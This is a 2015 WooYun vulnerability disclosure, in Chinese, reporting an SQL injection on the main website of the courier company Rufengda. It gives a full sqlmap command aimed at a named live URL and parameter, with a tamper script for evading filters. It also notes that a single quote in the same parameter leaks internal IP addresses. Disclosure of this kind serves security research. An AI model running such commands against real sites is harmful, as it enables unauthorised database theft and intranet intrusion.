当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0137501

漏洞标题:如风达主站存在SQL注入漏洞

相关厂商:如风达

漏洞作者: lightless

提交时间:2015-08-28 18:58

修复时间:2015-10-12 19:00

公开时间:2015-10-12 19:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-28: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-10-12: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

快递送的确实挺快的。。。

详细说明:

主站SQL注入一枚:

python sqlmap.py -u "http://www.rufengda.com/front/queryServiceLocation.do" --data "areaName=%E5%8C%97%E4%BA%AC-%E5%8C%97%E4%BA%AC%E5%B8%82-%E8%A5%BF%E5%9F%8E%E5%8C%BA&area.id=110100&address" -p area.id --random-agent --tamper=space2comment


数据挺多,不过我看不懂,重要与否你们自评吧。
PS:还有个内网信息泄露,area.id参数直接加个单引号就出来了。

5.png


把内网IP爆出来了,后面如果内网渗透的话应该有用吧。(其实然并卵

漏洞证明:

1.png


2.png


3.png


4.png


不深入了,到此为止,一个表就几千条数据,更别说这么多库这么多表了。
谢绝跨省。

修复方案:

过滤啊。。

版权声明:转载请注明来源 lightless@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝